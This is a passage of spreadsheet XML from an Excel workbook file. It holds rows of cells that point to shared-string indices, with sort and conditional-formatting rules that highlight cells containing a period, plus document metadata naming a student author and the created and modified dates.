      <c r="B334" t="s">
        <v>1000</v>
      </c>
      <c r="C334" t="s">
        <v>1001</v>
      </c>
    </row>
    <row r="335" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A335" t="s">
        <v>1002</v>
      </c>
      <c r="B335" t="s">
        <v>1003</v>
      </c>
      <c r="C335" t="s">
        <v>1004</v>
      </c>
    </row>
    <row r="336" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A336" t="s">
        <v>1005</v>
      </c>
      <c r="B336" t="s">
        <v>1006</v>
      </c>
      <c r="C336" t="s">
        <v>1007</v>
      </c>
    </row>
    <row r="337" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A337" t="s">
        <v>1008</v>
      </c>
      <c r="B337" t="s">
        <v>1009</v>
      </c>
      <c r="C337" t="s">
        <v>1010</v>
      </c>
    </row>
    <row r="338" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A338" t="s">
        <v>1011</v>
      </c>
      <c r="B338" t="s">
        <v>1012</v>
      </c>
      <c r="C338" t="s">
        <v>1013</v>
      </c>
    </row>
    <row r="339" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A339" t="s">
        <v>1014</v>
      </c>
      <c r="B339" t="s">
        <v>1015</v>
      </c>
      <c r="C339" t="s">
        <v>1016</v>
      </c>
    </row>
    <row r="340" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A340" t="s">
        <v>1017</v>
      </c>
      <c r="B340" t="s">
        <v>1018</v>
      </c>
      <c r="C340" t="s">
        <v>1019</v>
      </c>
    </row>
    <row r="341" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A341" t="s">
        <v>1020</v>
      </c>
      <c r="B341" t="s">
        <v>1021</v>
      </c>
      <c r="C341" t="s">
        <v>1022</v>
      </c>
    </row>
    <row r="342" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A342" t="s">
        <v>1023</v>
      </c>
      <c r="B342" t="s">
        <v>1024</v>
      </c>
      <c r="C342" t="s">
        <v>1025</v>
      </c>
    </row>
    <row r="343" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A343" t="s">
        <v>1026</v>
      </c>
      <c r="B343" t="s">
        <v>1027</v>
      </c>
      <c r="C343" t="s">
        <v>1028</v>
      </c>
    </row>
    <row r="344" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A344" t="s">
        <v>1029</v>
      </c>
      <c r="B344" t="s">
        <v>1030</v>
      </c>
      <c r="C344" t="s">
        <v>1031</v>
      </c>
    </row>
    <row r="345" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A345" t="s">
        <v>1032</v>
      </c>
      <c r="B345" t="s">
        <v>1033</v>
      </c>
      <c r="C345" t="s">
        <v>1034</v>
      </c>
    </row>
    <row r="346" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A346" t="s">
        <v>1035</v>
      </c>
      <c r="B346" t="s">
        <v>1036</v>
      </c>
      <c r="C346" t="s">
        <v>1037</v>
      </c>
    </row>
    <row r="347" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A347" t="s">
        <v>1038</v>
      </c>
      <c r="B347" t="s">
        <v>1039</v>
      </c>
      <c r="C347" t="s">
        <v>1040</v>
      </c>
    </row>
    <row r="348" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A348" t="s">
        <v>1041</v>
      </c>
      <c r="B348" t="s">
        <v>1042</v>
      </c>
      <c r="C348" t="s">
        <v>1043</v>
      </c>
    </row>
    <row r="349" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A349" t="s">
        <v>1044</v>
      </c>
      <c r="B349" t="s">
        <v>1045</v>
      </c>
      <c r="C349" t="s">
        <v>1046</v>
      </c>
    </row>
    <row r="350" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A350" t="s">
        <v>1047</v>
      </c>
      <c r="B350" t="s">
        <v>1048</v>
      </c>
      <c r="C350" t="s">
        <v>1049</v>
      </c>
    </row>
    <row r="351" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A351" t="s">
        <v>1050</v>
      </c>
      <c r="B351" t="s">
        <v>1051</v>
      </c>
      <c r="C351" t="s">
        <v>1052</v>
      </c>
    </row>
    <row r="352" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A352" t="s">
        <v>1053</v>
      </c>
      <c r="B352" t="s">
        <v>1054</v>
      </c>
      <c r="C352" t="s">
        <v>1055</v>
      </c>
    </row>
    <row r="353" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A353" t="s">
        <v>1056</v>
      </c>
      <c r="B353" t="s">
        <v>1057</v>
      </c>
      <c r="C353" t="s">
        <v>1058</v>
      </c>
    </row>
    <row r="354" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A354" t="s">
        <v>1059</v>
      </c>
      <c r="B354" t="s">
        <v>1060</v>
      </c>
      <c r="C354" t="s">
        <v>1061</v>
      </c>
    </row>
    <row r="355" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A355" t="s">
        <v>1062</v>
      </c>
      <c r="B355" t="s">
        <v>1063</v>
      </c>
      <c r="C355" t="s">
        <v>1064</v>
      </c>
    </row>
    <row r="356" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A356" t="s">
        <v>1065</v>
      </c>
      <c r="B356" t="s">
        <v>1066</v>
      </c>
      <c r="C356" t="s">
        <v>1067</v>
      </c>
    </row>
    <row r="357" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A357" t="s">
        <v>1068</v>
      </c>
      <c r="B357" t="s">
        <v>1069</v>
      </c>
      <c r="C357" t="s">
        <v>1070</v>
      </c>
    </row>
    <row r="358" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A358" t="s">
        <v>1071</v>
      </c>
      <c r="B358" t="s">
        <v>1072</v>
      </c>
      <c r="C358" t="s">
        <v>1073</v>
      </c>
    </row>
    <row r="359" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A359" t="s">
        <v>1074</v>
      </c>
      <c r="B359" t="s">
        <v>1075</v>
      </c>
      <c r="C359" t="s">
        <v>1076</v>
      </c>
    </row>
    <row r="360" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A360" t="s">
        <v>1077</v>
      </c>
      <c r="B360" t="s">
        <v>1078</v>
      </c>
      <c r="C360" t="s">
        <v>1079</v>
      </c>
    </row>
    <row r="361" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A361" t="s">
        <v>1080</v>
      </c>
      <c r="B361" t="s">
        <v>1081</v>
      </c>
      <c r="C361" t="s">
        <v>1082</v>
      </c>
    </row>
    <row r="362" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A362" t="s">
        <v>1083</v>
      </c>
      <c r="B362" t="s">
        <v>1084</v>
      </c>
      <c r="C362" t="s">
        <v>1085</v>
      </c>
    </row>
    <row r="363" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A363" t="s">
        <v>1086</v>
      </c>
      <c r="B363" t="s">
        <v>1087</v>
      </c>
      <c r="C363" t="s">
        <v>1088</v>
      </c>
    </row>
    <row r="364" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A364" t="s">
        <v>1089</v>
      </c>
      <c r="B364" t="s">
        <v>1090</v>
      </c>
      <c r="C364" t="s">
        <v>1091</v>
      </c>
    </row>
    <row r="365" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A365" t="s">
        <v>1092</v>
      </c>
      <c r="B365" t="s">
        <v>1093</v>
      </c>
      <c r="C365" t="s">
        <v>1094</v>
      </c>
    </row>
  </sheetData>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:C116">
    <sortCondition sortBy="cellColor" ref="A2:A116" dxfId="2"/>
  </sortState>
  <conditionalFormatting sqref="A1:A116 A366:A1048576">
    <cfRule type="containsText" dxfId="1" priority="2" operator="containsText" text=".">
      <formula>NOT(ISERROR(SEARCH(".",A1)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A117:A365">
    <cfRule type="containsText" dxfId="0" priority="1" operator="containsText" text=".">
      <formula>NOT(ISERROR(SEARCH(".",A117)))</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Refat T A Othman (Student ENG 22)</dc:creator>
  <cp:lastModifiedBy>Refat T A Othman (Student ENG 22)</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-07T16:21:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-12T14:23:12Z</dcterms:modified>
</cp:coreProperties>
</file>